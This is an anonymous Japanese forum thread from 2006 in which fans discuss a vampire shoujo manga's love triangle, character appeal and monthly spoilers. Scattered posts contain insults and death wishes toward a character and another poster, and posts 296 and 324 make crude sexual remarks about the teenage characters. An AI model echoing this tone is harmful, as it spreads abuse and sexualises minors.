167 :花と名無しさん:2006/10/31(火) 02:44:29 ID:???0
零=バイキンマン
ひねくれ具合もぴったりだなw w w

168 :花と名無しさん:2006/10/31(火) 06:00:51 ID:???O
バイキンマンをドキンチャンに隠れていびる食パンマン…

169 :花と名無しさん:2006/10/31(火) 11:36:53 ID:???0
そういえばトリビアで
食パンマンとドキンちゃんは絶対に結ばれないってあったような・・・
枢派なのにwww

170 :花と名無しさん:2006/10/31(火) 11:56:57 ID:???0
アンパンマンに恋愛関係で知ったような口利かれても、お前が言うかとしか思えん
いったいお前の恋愛の何がわかるのかと…
まあ言わせてるのは作者だから、実際にありえないんだろうなあの二人は

傍から見た恋愛関係で言えば枢はバイキンマンっぽいかな
明らかに零(食パンマン)の方が優姫(ドキンちゃん)に気にかけられてる辺り

171 :花と名無しさん:2006/10/31(火) 12:16:38 ID:???O
↑え〜そうかなぁ?
零はバイキンマンっぽいよ
食パンマンが腹黒そうなのわかる。毎週アンパンマン見てますから!w


172 :花と名無しさん:2006/10/31(火) 12:23:52 ID:???0
というかアンパンマンの話自体がスレチな気が・・・

話豚切るけど
なんで優姫は記憶がないのに年齢はわかってるの?
推定年齢ならわかるけどそうじゃないっぽいし・・・

173 :花と名無しさん:2006/10/31(火) 16:45:39 ID:???O
かなめきしょ はやく おわれ かなめはくたばれYO

174 :花と名無しさん:2006/11/01(水) 22:54:10 ID:+s3Cu/lyO
>>172
私もそれ気になってた。
でも誕生日も勝手に決めてたしあの位の年の子は一歳違えばかなり
違うから見た目で適当に決めたのかと思って自己完結してたけど…。
優姫については謎が多すぎる。

175 :花と名無しさん:2006/11/01(水) 22:58:32 ID:???0
優姫って色んな不審なことに何ら疑問を持ってないよな…ある意味不思議ちゃん
今思えばあれはどういうことなの?とか聞きそう
あの腹黒コンビにうまいこと調教、もとい洗脳されたかな

176 :花と名無しさん:2006/11/02(木) 07:09:37 ID:???O
かなめきしょい

177 :花と名無しさん:2006/11/02(木) 22:16:37 ID:???0
元老院の刺客、弱すぎじゃね?全員メガネ装着なのも笑える

178 :花と名無しさん:2006/11/03(金) 07:09:04 ID:???O
なんでめがねかけてんの ぐらさんもいるけどね まつりのなんかのあれ?

179 :花と名無しさん:2006/11/03(金) 10:41:54 ID:???O
作者がメガネスキーだったような気が

180 :花と名無しさん:2006/11/03(金) 12:42:33 ID:???O
吸血鬼にも近視とか遠視とか老眼とかあるんかね

181 :花と名無しさん:2006/11/03(金) 20:47:10 ID:???0
優姫が何考えてるのかわからないよ

182 :花と名無しさん:2006/11/03(金) 20:57:45 ID:???O
理事長乙


優姫の年令って理事長が身長、体重で決めたんじゃない?

183 :花と名無しさん:2006/11/04(土) 09:07:07 ID:???O
>>182
自分もそう思ってた

184 :花と名無しさん:2006/11/04(土) 11:08:59 ID:???0
>>181
同意。
零とくっつく事になっても文句はないけど、なんだかなあって感じ。

185 :花と名無しさん:2006/11/04(土) 13:53:03 ID:???0
理事長も枢も何考えてるかわからないよ

186 :花と名無しさん:2006/11/04(土) 17:39:45 ID:???0
枢より零の方が好きってことに優姫がそろそろ気づきそう

187 :花と名無しさん:2006/11/04(土) 18:00:33 ID:???0
枢のことは憧れから本当の恋愛になりかけてたけど、
その一歩手前で足踏みしてる時に零がきたって感じかね?

188 :花と名無しさん:2006/11/04(土) 18:56:18 ID:???0
明らかに零>枢だけど男として好きかっていうとちょっと疑問かも…
そういう描写少ないし、そういうのすっ飛ばして大事って希ガス

189 :花と名無しさん:2006/11/04(土) 19:03:27 ID:???O
枢→憧れ&命の恩人
零→家族愛って感じが強い気がする。
この気持ちが恋愛に昇華する時が来るのだろうか…。

190 :花と名無しさん:2006/11/04(土) 20:05:45 ID:???0
枢はめるぷりの仲央路くんのように心変わりされるポジションなのか・・・

191 :花と名無しさん:2006/11/04(土) 20:15:09 ID:???0
枢はめるぷりならジェイドw
零はレイに似てる

192 :花と名無しさん:2006/11/04(土) 21:50:23 ID:???O
少女コミックに爆笑 だれかとめろよむりだあれ まあみなみかぜなんちゃが休みだからな あのクソ女

193 :花と名無しさん:2006/11/06(月) 21:05:48 ID:???0
自分はつい最近まで、理事長は実はヴァンパイアだと思っていた(マジで)


194 :花と名無しさん:2006/11/06(月) 23:27:50 ID:???0
とりあえずただもんじゃなさそう
悪い人ではなさそうだけど目標のためなら汚いこともしそうだし

195 :花と名無しさん:2006/11/07(火) 22:32:10 ID:???0
結局優姫はどっちと恋人になろうがあまり幸せになれなさそう。
枢も零もヴァンパイアだから年取るの遅いし、一人で年取っていくのは優姫かわいそうな気が…。
しかも零はレベルEになって死ぬかもだし。

196 :花と名無しさん:2006/11/07(火) 23:11:17 ID:???0
優姫は人間なの?

197 :花と名無しさん:2006/11/08(水) 00:11:15 ID:???0
さあ…

>>195
枢といるとその他の人との関わりが制限されそうな希ガス
枢が妨害するんではなく自然にそうなりそう

198 :花と名無しさん:2006/11/08(水) 00:27:22 ID:???0
閉鎖的になるな、ただでさえ優姫は一人で町に出られないらしいのに

199 :花と名無しさん:2006/11/08(水) 11:30:39 ID:???O
今のゆうきがいちばんかわいいね かなめきしょいよきしょ

200 :花と名無しさん:2006/11/08(水) 14:57:33 ID:???0
優姫自身、元気な割にあんまり他人に心開かない感じがする。
親切なんだけど。

201 :花と名無しさん:2006/11/08(水) 17:49:11 ID:???O
まわりがあんなんだからな とくにかなめ きしょいから

202 :花と名無しさん:2006/11/09(木) 05:06:01 ID:qaIWoe+KO
男だからきづかないのかもしれないがそんなにうざいか奴は

203 :花と名無しさん:2006/11/09(木) 19:36:16 ID:???0
きしょいかな?
まあ、きしょいかは置いといて
自分のした事をしらばっくれてる上に、零に疑いかかっても知らん顔な
今回の態度にはがっかりしたな

204 :花と名無しさん:2006/11/09(木) 19:37:46 ID:???0
知らん顔というか、庇いはしたけどさ
でも今回の事で人気ダウンは必至では?

205 :花と名無しさん:2006/11/09(木) 21:17:08 ID:???0
前々からブラックアピールが激しかったキャラだからがっかりはせん。
「うわお、ブラック」ってびっくらこいたけど。
中途半端な半善人半悪党のグレイ止まりよりは清々しいなw

206 :花と名無しさん:2006/11/09(木) 21:30:16 ID:???0
どうせならとことん悪を貫いてどこへ出しても恥ずかしくないブラックになれ

207 :花と名無しさん:2006/11/10(金) 02:13:59 ID:???O
>>202 きしょいからみりゃわかんじゃんあんた男?へえ(笑)ゆうきちゃんのほうがわたしはこのみきみは?(笑)

208 :花と名無しさん:2006/11/10(金) 03:06:34 ID:iEePCiatO
>>207
俺は副寮長が好きだなぁ
零はツンデレぶりに呆れるしカナメはかっこいいが悪党ってわかりすぎでアレ
もうちよっといい人でいていきなり本性だしてほしかった

209 :花と名無しさん:2006/11/10(金) 03:19:08 ID:iEePCiatO
ってか男で少女漫画ばっか読んでるんだけとやっぱりきもいかなぁ


210 :花と名無しさん:2006/11/10(金) 03:34:11 ID:???O
え、きみふっふくふくりっりっ寮長ってたくまのこと?

211 :花と名無しさん:2006/11/10(金) 03:35:37 ID:???O
たったくまが好きなの????!!!!

212 :花と名無しさん:2006/11/10(金) 03:41:58 ID:iEePCiatO
なんかさっぱりしてていいかなと

213 :花と名無しさん:2006/11/10(金) 03:43:00 ID:iEePCiatO
皆は誰がすきなの?

214 :ナイト:2006/11/10(金) 05:06:09 ID:iEePCiatO
これでいこう

215 :花と名無しさん:2006/11/10(金) 05:49:42 ID:???O
ナイトってひと
たくまって一条?わたしもだいすきなんだけど・・・おとこからももてるたくま‥やっぱりたくま最強だ

216 :花と名無しさん:2006/11/10(金) 05:53:31 ID:???O
たくまって顔がかわいいからね(笑)

217 :ナイト:2006/11/10(金) 06:23:49 ID:iEePCiatO
キタコレ

218 :花と名無しさん:2006/11/10(金) 07:16:30 ID:???O
たくまの魅力はかわいい ほんとうにかわいい

219 :花と名無しさん:2006/11/10(金) 07:24:21 ID:XKOo6QUI0
test

220 :a:2006/11/10(金) 07:25:14 ID:???0
test2

221 :花と名無しさん:2006/11/10(金) 07:52:30 ID:???O
まあゆうきもかわいいと思うけどゆうきって人気あるからいやだ ゆうきかわいいよ

222 :花と名無しさん:2006/11/10(金) 08:22:02 ID:???O
かなめきしょいはやくしんでくれ

223 :花と名無しさん:2006/11/10(金) 10:42:30 ID:???0
副寮長マンセー
かなめ?暗いよw

224 :花と名無しさん:2006/11/10(金) 10:50:43 ID:???O
わたしだってたくまばんざいだからたくまばんざーい

225 :花と名無しさん:2006/11/10(金) 10:52:33 ID:???O
たくまってさっぱりしてるかな。うんしてるかもいうとおりだね、またあらたな魅力にきがついたありがとたくますきだー!!!!!!!!

226 :ナイト:2006/11/10(金) 19:51:55 ID:iEePCiatO
今何巻まででてるの?

227 :花と名無しさん:2006/11/11(土) 00:11:10 ID:???O
あのさ。
区別するためのコテハンはともかくsageようや

228 :ナイト:2006/11/11(土) 00:46:26 ID:???O
わかりました

229 :花と名無しさん:2006/11/11(土) 02:19:36 ID:???0
>>228
4巻まで出てる

230 :ナイト:2006/11/11(土) 04:48:04 ID:???O
全部読んでた、ありがと

231 :花と名無しさん:2006/11/11(土) 19:46:18 ID:???O
むしろ枢×零

232 :花と名無しさん:2006/11/11(土) 23:06:50 ID:???0
>>227
私はあなたをとても愛しています
いつもスレにいるあなたをとても愛しています
愛しています


愛しています愛しています愛しています愛しています愛しています愛しています愛しています愛しています
愛しています愛しています愛しています愛しています愛しています愛しています愛しています愛しています

233 :花と名無しさん:2006/11/12(日) 11:45:34 ID:???O
今時 きしょい って使う人いんだね。笑

きしょい 使う奴キモイゥ笑

234 :花と名無しさん:2006/11/12(日) 12:46:55 ID:???O
>>232 すげえうけるあいのこくはくかよ爆笑

235 :花と名無しさん:2006/11/12(日) 12:48:20 ID:???O
きしょい つかうだろ ふつうに きのうもつかったし 時代おくれなの? 流行ってついてけない

236 :ナイト:2006/11/12(日) 13:24:20 ID:6mKcNpC9O
いにゃー

237 :花と名無しさん:2006/11/12(日) 13:24:43 ID:???O
きしょって家族でのにちじょうようごなんだけど 時代おくれなの? じゃあなんておきかえんの現代人は

238 :ナイト:2006/11/12(日) 15:11:10 ID:6mKcNpC9O
金毛

239 :花と名無しさん:2006/11/12(日) 16:57:28 ID:???O
金の毛? たくまみたい 金毛だいすきなんだけど

240 :花と名無しさん:2006/11/12(日) 17:38:37 ID:???O
たくまばんざい

241 :ナイト:2006/11/12(日) 19:20:49 ID:6mKcNpC9O
きもい→金毛→きんもー→きもー→きもい

242 :花と名無しさん:2006/11/12(日) 19:24:58 ID:???O
はぁ? いやな感じ 金髪ばんざいだからそんなおきかえ無理 ほかにないの黒できしょいにおきかえとかさ

243 :ナイト:2006/11/12(日) 20:32:38 ID:6mKcNpC9O
わからん

244 :花と名無しさん:2006/11/13(月) 00:57:33 ID:???O
黒できしょいをかんがえてたけどおもいつかなかった ニュアンスが‥ だれか創って なんかまじムカつく ナイトってひと、つくってよ

245 :ナイト:2006/11/13(月) 02:56:13 ID:UXqmn5/YO
きもいでいいじゃん

246 :花と名無しさん:2006/11/13(月) 04:04:43 ID:???O
きしょいのほうがいいやすいから たくまばんざい

247 :花と名無しさん:2006/11/13(月) 04:05:51 ID:???O
ナイトってきみ 学生さん?

248 :ナイト:2006/11/13(月) 06:29:00 ID:UXqmn5/YO
ウルトラニート@秋葉原です

249 :花と名無しさん:2006/11/13(月) 16:02:01 ID:???O
ふうん そうなんだいやわたしもにーとだし(笑)まっいいや ねえ たくまそんなに好きなの?

250 :ナイト:2006/11/13(月) 21:01:08 ID:UXqmn5/YO
そんなにっていうか選ぶとしたらって感じかなぁ
ってか零って見てたらかなり苛々するんだけど女はああゆうのが好きなのかい?

251 :花と名無しさん:2006/11/14(火) 01:32:31 ID:???0
母性本能くすぐられるってやつ?>零好き


252 :ナイト:2006/11/14(火) 03:14:18 ID:???O
なるほど、勉強になった

253 :花と名無しさん:2006/11/14(火) 10:19:53 ID:???O
ぜろといちるはかわいいじゃん いらいら全然しないんだが(苦笑)

254 :花と名無しさん:2006/11/14(火) 10:21:27 ID:???O
わたしはしずかが死んでかなしいかった まじいったん見るきしなかったマジで

255 :花と名無しさん:2006/11/14(火) 12:21:53 ID:???O
わたしもかなりたくま好きだよ

256 :花と名無しさん:2006/11/15(水) 11:56:23 ID:???O
香ばしくなってまいりました

257 :ナイト:2006/11/16(木) 08:02:54 ID:VnJeRk/iO
早く続きでないかなぁ

258 :花と名無しさん:2006/11/16(木) 17:11:30 ID:???O
幼児が集まるスレですかここは

259 :花と名無しさん:2006/11/17(金) 13:42:11 ID:zye51I9NO
自演晒しアゲ

260 :花と名無しさん:2006/11/17(金) 13:48:08 ID:???O
まだ収まってなかったのか

261 :花と名無しさん:2006/11/17(金) 13:51:12 ID:???O
いい加減うざいよね
バレてないとでも思ってんのかな

262 :花と名無しさん:2006/11/19(日) 01:01:54 ID:???O
まあパソコンいじれるやつばっか だからな

263 :花と名無しさん:2006/11/19(日) 21:02:45 ID:???0
誰を好きでもかまわないけど、
枢様を侮辱するのは許さない

264 :花と名無しさん:2006/11/20(月) 16:53:55 ID:???O
かなめのファンなんかいたんだ・・・ なんかびっくりしたよ

265 :花と名無しさん:2006/11/20(月) 19:35:21 ID:???0
そりゃいるだろ。人の好みは十人十色だ

266 :花と名無しさん:2006/11/20(月) 20:04:23 ID:???O
いないと 思ってるた

267 :花と名無しさん:2006/11/20(月) 23:37:34 ID:???O
バレいつ来るかなー
続きが気になってしょうがない

268 :花と名無しさん:2006/11/21(火) 02:38:26 ID:???O
バレキターー

今回エロスw

269 :花と名無しさん:2006/11/21(火) 03:32:19 ID:???O
バレ見た。
本当エロすぎ。
少コミとかよりよっぽどエロいよ。

270 :花と名無しさん:2006/11/21(火) 12:50:33 ID:???O
キスすらないのにね。
だんだん優姫→零の描写がなされてきた感じ?

271 :花と名無しさん:2006/11/21(火) 13:59:54 ID:???O
優姫、女としての面より母性本能が強そうだから、
決してヘタレじゃないのに報われない切ない零路線が妥当だな

272 :花と名無しさん:2006/11/21(火) 15:02:53 ID:???O
こんげつなんにち発売なの

273 :花と名無しさん:2006/11/21(火) 16:02:55 ID:???0
24日

274 :花と名無しさん:2006/11/21(火) 17:03:30 ID:???O
>>272
自力で検索を推奨致します

275 :花と名無しさん:2006/11/21(火) 18:24:52 ID:???O
ありがと >>274だね(笑)

276 :花と名無しさん:2006/11/21(火) 20:46:14 ID:TC1YY+aX0
かなめって、優姫が好きなんだよね?
表情があんまり変わらないから、考えが読めない。
でも、かっこいいから好き。

277 :花と名無しさん:2006/11/22(水) 09:33:14 ID:???0
一見逆ハーに見えるが、実際は全然逆ハーじゃないマンガですね

278 :花と名無しさん:2006/11/22(水) 10:05:57 ID:???O
逆ハーって、少なくとも三人以上にモテモテってことだよね?
じゃあ逆ハーじゃないな

279 :花と名無しさん:2006/11/22(水) 12:31:51 ID:???0
枢と零以外からはオマケ扱いだもんな〜

280 :花と名無しさん:2006/11/22(水) 14:23:25 ID:???0
ヴァンパイア番外編またやるっぽい

281 :花と名無しさん:2006/11/22(水) 15:01:35 ID:???O
かなめなんかかっこよくない ださすぎる 嫌なキャラクターだよ

282 :花と名無しさん:2006/11/22(水) 18:30:17 ID:???O
>>280 d
なんか一定ペースで載るね。またその前に50Pとかあるのかな

283 :花と名無しさん:2006/11/22(水) 20:28:12 ID:???0
バレ見たけど、零と優姫が(まだ)好きあってないのに
ペッティングみたいなエロいことばっかりしてるのは嫌だなぁ 

284 :花と名無しさん:2006/11/22(水) 20:33:49 ID:???0
1.ペッティング【petting】
男女間の、性的な愛撫(あいぶ)や刺激。性交には至らないもの。


確かにエロいなw

285 :花と名無しさん:2006/11/22(水) 20:40:59 ID:???0
ここまできたら零×優姫で決まりだね♪
枢×優姫スキーなファンはご愁傷さまですw


286 :花と名無しさん:2006/11/22(水) 20:42:42 ID:???O
確かに今までは、零の生命維持のために
必要に迫られての吸血だったもんね。
今回からエロさがプラスαになった気がしなくもない

287 :花と名無しさん:2006/11/22(水) 21:01:38 ID:???O
痛いペッティングだなあ、齧りつつ…
そいや枢も優姫の傷舐めてたな

288 :花と名無しさん:2006/11/22(水) 22:21:39 ID:???0
これからどんどん吸血の場所もあちこち移動していくのだろうか

289 :花と名無しさん:2006/11/22(水) 23:07:13 ID:???O
でも首、手首ときたら次は何だろう。
吸血姫なんとか みたいに胸元とか?

290 :花と名無しさん:2006/11/23(木) 02:05:47 ID:???0
>>28
これ、ネタバレすんなよ

咬まれるのもアレだが舐められるのは好意持ってる相手じゃないときついな

291 :花と名無しさん:2006/11/23(木) 02:08:54 ID:???0
>>28>>289だった

292 :花と名無しさん:2006/11/23(木) 09:44:28 ID:???0
首以外に吸われた痕見たら枢は我慢出来ずにキレるかなw

293 :花と名無しさん:2006/11/23(木) 15:32:12 ID:???O
290>>マジですまん、ついうっかり

294 :花と名無しさん:2006/11/24(金) 07:34:48 ID:???O
きょうはつばい じゃん

295 :花と名無しさん:2006/11/24(金) 16:48:03 ID:???0
今月のエロさは異常w
少コミかと思ったw
でもって悲恋路線まっしぐらだね

296 :花と名無しさん:2006/11/24(金) 18:03:06 ID:bRp8oMCtO
指舐めて手首咬んでエロいよ
こいつら二人ともちんこもまんこも絶対に濡れてるな

297 :花と名無しさん:2006/11/25(土) 01:36:26 ID:???0
樋野さんMIXIで見つけちゃったw

298 :花と名無しさん:2006/11/25(土) 01:59:06 ID:???0
今月号の付録イラストって概出のもの?

299 :花と名無しさん:2006/11/25(土) 11:27:06 ID:???O
血を吸われる時の鈍い痛みってどんな感じなんだろう?

300 :花と名無しさん:2006/11/25(土) 11:51:21 ID:???O
ぶっとい注射器で採血される感じ?

今回あんまり進まなかったな
次回へのつなぎ・アイドル掘り下げ的内容

301 :花と名無しさん:2006/11/25(土) 13:31:01 ID:???0
今月は絵が雑に見えて萌えなかった
しかし優姫は舐めてと自分から誘う大胆な子になったもんだ

302 :花と名無しさん:2006/11/25(土) 17:59:59 ID:???0
零の「笑えよ」で萌えてしまった自分は少数派ですかそうですかorz

303 :花と名無しさん:2006/11/25(土) 18:18:21 ID:???0
そのシーンって、あとで単行本のおまけ漫画で
ギャグにされそうだと思ってしまった自分も少数派ですかそうですかorz

304 :花と名無しさん:2006/11/25(土) 19:00:36 ID:???O
かなめとゆうきはくっつかないよね

305 :花と名無しさん:2006/11/25(土) 19:05:05 ID:???0
>>298
既出のものだよ

306 :花と名無しさん:2006/11/25(土) 19:05:41 ID:w5J8eqGxO
>>297 へ〜

307 :花と名無しさん:2006/11/25(土) 19:07:52 ID:???O
>>305ありがとう

308 :花と名無しさん:2006/11/25(土) 22:25:54 ID:???0
枢と優姫がくっついてほしいと思ってた自分は最近の流れがとてもカナシス

309 :花と名無しさん:2006/11/25(土) 23:10:39 ID:???0
>>308
自分は零派だから嬉しいけど…
このままいくと悲恋モノの相手は零じゃないかと心配してしまうよ

310 :花と名無しさん:2006/11/25(土) 23:23:22 ID:???O
このまま零まっしぐらってことはないと思う。
最終的に零でも、枢サイドからの揺り返しはあるだろな。
枢が自分から突撃するかどうかわからんが。

311 :花と名無しさん:2006/11/25(土) 23:26:56 ID:???0
枢は優姫を可愛がってるシーンは容易に思い浮かぶが
男として迫ってるのは想像し難いんだよな。

312 :花と名無しさん:2006/11/25(土) 23:28:39 ID:???0
>>308
(´・ω・`)人(´・ω・`)

最初からわかっていたことだけどフラグ立ちが濃厚になってきてorz
最後は三人誰にとっても悲恋なのかも知れないが
でも、報われるのはやっぱり零なんだろうなぁ

313 :花と名無しさん:2006/11/25(土) 23:38:20 ID:???0
>>311
枢はどこまでも「自分とは違う世界」の憧れの人って感じだもんな…>優姫
宇宙人に恋してるような感覚?

314 :花と名無しさん:2006/11/25(土) 23:52:33 ID:???0
藍堂はいつまで家出してるつもりだろ
今回の優姫の言葉でまた月の寮に戻るのかな

315 :花と名無しさん:2006/11/25(土) 23:55:38 ID:???0
宇宙人ってw
せめてアイドルに恋してるとかにしてくれw

辛い時に身近にいてくれる人のほうに気は移るよなぁ
枢は優姫を放置しすぎだよ〜。
踏み込めないのは兄妹だとか・・・orz

316 :花と名無しさん:2006/11/26(日) 00:08:35 ID:???0
零が優姫を好きになった過程は嫌ってほど分かるけど、優姫が零を好きになる理由って?
零の魅力は分かるがそこんとこイマイチはっきりしない。
ほっとけない、家族愛の延長だけじゃ弱いしなあ。

317 :花と名無しさん:2006/11/26(日) 00:10:13 ID:???0
吸血されているうちに好きになったんだYO!
Hから始まる恋もあるってw

318 :花と名無しさん:2006/11/26(日) 00:15:50 ID:???0
>>316
いつもそばにいてくれる人ってことじゃないかな
ss漫画でも、そんな暗示があったし
弟ような気持ちで接していたら、いつのまにか気になる人になってたという
ベタだけどねw

319 :花と名無しさん:2006/11/26(日) 00:17:53 ID:???0
枢も零も優姫に冷たいようで優しいよね
・・・優姫はツンデレが好きなのか?

320 :花と名無しさん:2006/11/26(日) 00:39:56 ID:???0
>>316−318
吸血鬼化したことで、最初は弟みたいな感じで、守ってあげなきゃ! だったけど
シズカ編から失いたくない、大事な人 とかそんな風になってきたんじゃないかと。
先月・今月号あたりでそれを自覚し始めた…
と自分は思ってるんだけど、どうだろう。

321 :花と名無しさん:2006/11/26(日) 15:57:54 ID:???0
私は枢派だけど、誰かとくっつかれるのは嫌かも。
最後まで孤高の人でいてほしいというか。
だから零に頑張ってもらおう。

322 :花と名無しさん:2006/11/26(日) 18:44:40 ID:???O
ゆうきもたくまも最後どうなっちゃうんだろうね

323 :花と名無しさん:2006/11/26(日) 20:16:34 ID:???0
>今月のエロさは異常w

同意
でも綺麗な表現だし粘っこく感じないから好き

が、ここが限度って感じかな
知る人ぞ知る、これ以上エロ表現が増して
汁ミ漫画と化したらファンから一転、猛烈批判攻撃に移らせていただくかも…

頼むから、そんな事にはならないでくれ

324 :花と名無しさん:2006/11/26(日) 22:22:14 ID:???0
零が優姫のツンパに手を突っ込んでピチュクチュ
股間に顔を埋めてピチュクチュ
「こんなの絶対嫌なのに」と言いつつ感じまくる優姫

死ぬほど見たくねぇえ〜〜〜〜〜!!
そんなの性コミとエロ妄想だけが生きがいの変態同人作家だけで十分だ!

325 :花と名無しさん:2006/11/26(日) 22:35:02 ID:???0
とらわれもめるぷりもやり過ぎることはなかったから、その辺は大丈夫だと思ってる。
絵の雰囲気がどこか艶かしいイメージがあるから際立つんだろうね。>エロさ

326 :花と名無しさん:2006/11/26(日) 23:14:23 ID:???0
まあ樋野さんにはそういう心配はしてないよ

327 :花と名無しさん:2006/11/26(日) 23:32:05 ID:???0
少コミならもっとエロ描けになるんだろうけど
LaLaだと逆に抑えて下さいとかじゃないだろうか

328 :花と名無しさん:2006/11/27(月) 00:39:42 ID:???O
私はエロイとか思わなかったな。

329 :花と名無しさん:2006/11/27(月) 02:27:16 ID:???0
エロイとは思わなかったけど
「くちゅ」の擬音をみたとき性コミ思い出した

330 :花と名無しさん:2006/11/27(月) 04:17:39 ID:???O
樋野さんってどこ住在?
ホストとか行ってたりしない?

331 :花と名無しさん:2006/11/27(月) 07:55:38 ID:???O
吸われて痛いのか、吸われた痛みで感じてるのか、そこが問題だ。

332 :花と名無しさん:2006/11/27(月) 10:44:53 ID:???0
>>329
逆にドロッとかボタッとかリアルな血の滴り音出されても怖い

333 :花と名無しさん:2006/11/27(月) 11:25:56 ID:???0
今度の閑と壱縷の番外編にひそかに期待
壱縷は鬱陶しくて嫌いなんだけど、
変態っぽい閑にはあれくらい濃ゆ〜い奴のが心地よいのか

334 :花と名無しさん:2006/11/27(月) 13:04:20 ID:???O
枢もアメとムチの様に優姫に近付いては離れるのが原因で優姫が零に傾いてるの気付いてるよな?
それでも優姫を自分に向けさせようと必死じゃないのはやっぱり目的の為の手段だからなのか

335 :花と名無しさん:2006/11/27(月) 14:44:54 ID:???O
枢はそもそも色恋でガツガツ動くタイプじゃなさげ

336 :花と名無しさん:2006/11/27(月) 14:46:39 ID:???0
でも内心メラメラしてる

337 :花と名無しさん:2006/11/27(月) 19:07:41 ID:???O
・・・ムッツリ(ガッ

338 :花と名無しさん:2006/11/27(月) 20:03:49 ID:???O
333 どうゆうこと 説明して!!!!!

339 :花と名無しさん:2006/11/27(月) 20:06:05 ID:???O
>>330 間違えたよ 330ね どうゆう事だよ 説明してよ。

340 :花と名無しさん:2006/11/27(月) 23:46:31 ID:???0
いい加減枢も優姫や零と絡んでくれ
最近、爺様’s相手に夢中になってる枢しか見てないような…

341 :花と名無しさん:2006/11/28(火) 07:51:41 ID:???O
>>33

342 :花と名無しさん:2006/11/28(火) 07:54:08 ID:???O
>>330 起きてるかな? どうゆうことか説明を求めたいんだけど

343 :花と名無しさん:2006/11/28(火) 12:48:30 ID:???0
今度の番外編もショートなのかな?
あの暗い二人ってかなりしっかり描かないと意味不明になりそ

344 :花と名無しさん:2006/11/28(火) 21:35:47 ID:???0
閑と壱縷って独特そう…電波ゆんゆんな二人

345 :花と名無しさん:2006/11/28(火) 21:54:33 ID:???0
どーいう育ち方したらあんな言葉遣いになるんだ、枢は普通

346 :花と名無しさん:2006/11/28(火) 23:12:26 ID:???0
なんで壱縷は零をあんなに嫌ってるんだ?

347 :花と名無しさん:2006/11/28(火) 23:18:30 ID:???0
妬み嫉み劣等感…と思われる。
しかし、同じような状況の家庭は腐るほどあるので
壱縷が特別変異の変態と思われる。

348 :花と名無しさん:2006/11/29(水) 00:10:05 ID:???0
双子だからこそ余計に、てのはあると思うが極端だよね

349 :花と名無しさん:2006/11/29(水) 14:20:34 ID:???O
漫画というのは大袈裟なぐらいに分かりやすく表現しないとダメ出しされるんだよな実際。
それをヤマ場と言う。
今月読んで無いのだが皆さんエロエロ言い過ぎでワロタw
どこまでなんだ

350 :花と名無しさん:2006/11/29(水) 19:24:43 ID:???O
樋野まつりってホストに行ってるの?

351 :花と名無しさん:2006/11/29(水) 21:50:10 ID:???0
うざい
また自演か

352 :花と名無しさん:2006/11/29(水) 22:02:56 ID:???0
どーでもいいことだが、ハンターの家は転勤族なんだな…
引越し引越しで大変だ

353 :花と名無しさん:2006/11/29(水) 23:53:02 ID:???0
みんなエロエロ言ってるな
まあ確かにエロかったけど、性コミのようなありきたり直接的エロじゃなく
濃度がこゆいというか官能的なエロス  直接的でないからこそまた萌える


354 :花と名無しさん:2006/11/30(木) 00:02:45 ID:???O
だから自演じゃねえよ頭クソが

355 :花と名無しさん:2006/11/30(木) 00:03:46 ID:???O
死ね

356 :花と名無しさん:2006/11/30(木) 00:09:39 ID:???0
優姫の外見が幼いせいかあんまりエロく見えなかったよ…。

357 :花と名無しさん:2006/11/30(木) 08:26:03 ID:???O
ふと前回、今回の枢にはレクイエムが似合うなと思った。

358 :花と名無しさん:2006/11/30(木) 13:14:35 ID:???0
どんな感じっすか?

359 :花と名無しさん:2006/11/30(木) 23:15:03 ID:???O
ぶさかなめなんかにレクイエムなんてたいせれた曲似合うはずないだろ あいつ性格わりい 見てて苛つく
マジヤバい性格の悪さ 悪いとこはぶさなんだから治せよ ばかがふざ

360 :花と名無しさん:2006/11/30(木) 23:29:23 ID:???0
今回で元老院vs枢の図式がはっきりしたわけだから
もっと学園内にも動きが欲しいな。
夜間部もみんなじーっっとしてるし…。

361 :花と名無しさん:2006/12/01(金) 02:28:59 ID:???0
来月って特別編?

362 :花と名無しさん:2006/12/01(金) 10:00:08 ID:???0
アイドルや一条は動きだしてない?>夜間
枢の目的と優姫が自分の元へ戻ってくると確信してる理由を早く知りたい。
今これだけ零×優フラグがたってると揺り返しが怖い…

363 :花と名無しさん:2006/12/01(金) 13:16:48 ID:???O
>揺り返しが怖い
自分も…
まぁ枢×優がきたらきたで、それを見て悶える(顔には出ないだろうが)
零が見れるっていう楽しみがあるんだけど。

364 :花と名無しさん:2006/12/01(金) 13:28:31 ID:???O
>揺り返しが怖い
自分も…
まぁ枢×優がきたらきたで、それを見て悶える(顔には出ないだろうが)
零が見れるっていう楽しみがあるんだけど。

365 :花と名無しさん:2006/12/08(金) 22:55:18 ID:???O
早くみんな本気モードになってほしい

366 :花と名無しさん:2006/12/09(土) 01:32:27 ID:???0
番外編もうちょっとページ欲しかったな・・・
あと表紙が零だけじゃなくて優姫も書いて欲しかったな


367 :花と名無しさん:2006/12/09(土) 13:56:17 ID:???0
ロリ優姫に萌えるのは俺だけですか?
ロングヘアがイイ!

368 :花と名無しさん:2006/12/09(土) 16:42:08 ID:???O
シズカどうだった?!!!!彼女男いるんでしょ マジで苛つくクソッタレ

369 :花と名無しさん:2006/12/09(土) 18:30:41 ID:???O
あんまり閑の恋人について言及されてなかったね。

370 :花と名無しさん:2006/12/09(土) 19:49:14 ID:/gPFrMtx0
なんか支葵と莉磨に萌え

371 :花と名無しさん:2006/12/10(日) 00:14:29 ID:???O
よみきりってだれがいんの たくまいないのかよはあ

372 :花と名無しさん:2006/12/10(日) 12:37:48 ID:???O
閑の恋バナ、予想通りの内容だった
あれって閑の片思いだったのかな?相手から愛の言葉は貰ってないようだし

しかし零の吸血鬼化にまで嫉妬するなよ壱縷
零のことになると着てる服の色まで嫉ましいんジャマイカ?

373 :花と名無しさん:2006/12/10(日) 15:15:31 ID:???O
四歳児が「お兄ちゃんにだけおもちゃ買ってずるい!」


と言ってること同じなのか

374 :花と名無しさん:2006/12/10(日) 17:21:23 ID:???O
表紙の零は何をそんなに苦しがってるのかと(ry

375 :花と名無しさん:2006/12/10(日) 17:51:15 ID:???O
男の嫉妬は見苦しいのう
嫉妬も何も、零は閑大嫌いなんだから取られる心配ナッシング
閑がまり亜の体着てるのが不満…てことはやはり顔に惚れたのか

376 :花と名無しさん:2006/12/11(月) 20:59:17 ID:???O
まさかあれだけの内容とは露知らずに購入して後悔したw
本の厚さと中身が反比例してるよな

377 :花と名無しさん:2006/12/12(火) 00:07:13 ID:???O
閑、意外と単純な人だったんだな
